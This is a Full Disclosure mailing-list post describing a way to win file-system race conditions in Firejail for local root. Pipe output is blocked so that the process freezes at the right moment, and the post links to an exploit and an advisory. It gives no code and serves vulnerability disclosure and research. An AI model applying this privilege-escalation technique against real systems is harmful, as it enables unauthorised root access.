Rigged Race Against Firejail for Local Root: Using pipes/ptys to win races

[Roman Fiedler <roman.fiedler () unparalleled eu>]

Hello List,

100% reliable exploitation of file system time races (TOCTOU
vulnerabilities) may be hard as the timing depends on numerous
target system parameters (CPU cores, load, memory pressure, file
system type, ...). Instead of optimizing the exploit to win the
real race, the timing of Firejail stderr and stdout output was
analyzed. With the correct parameters known the Firejail process
can be frozen exactly in the right moment when attempting to
write a message to a filled pipe (blocking write). Thus the exploit
has any time in the world to modify the file system before restarting
Firejail by emptying the pipe again.

The technique proved useful to cut down the time required from
vulnerability discovery to creating a working exploit using the
recipy given in [1].

[1] https://unparalleled.eu/blog/2021/20210208-rigged-race-against-firejail-for-local-root/
[2] https://unparalleled.eu/blog/2021/20210208-rigged-race-against-firejail-for-local-root/UnjailMyHeart.c
[3] https://unparalleled.eu/publications/2021/advisory-unpar-2021-0.txt

Kind regards,
Roman Fiedler

| |  DI Roman Fiedler
| /  roman.fiedler at unparalleled.eu  +43 677 63 29 28 29
/ |  Unparalleled IT Services e.U.     FN: 516074h           VAT: ATU75050524
| |  https://unparalleled.eu/          Felix-Dahn-Platz 4, 8010 Graz, Austria


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/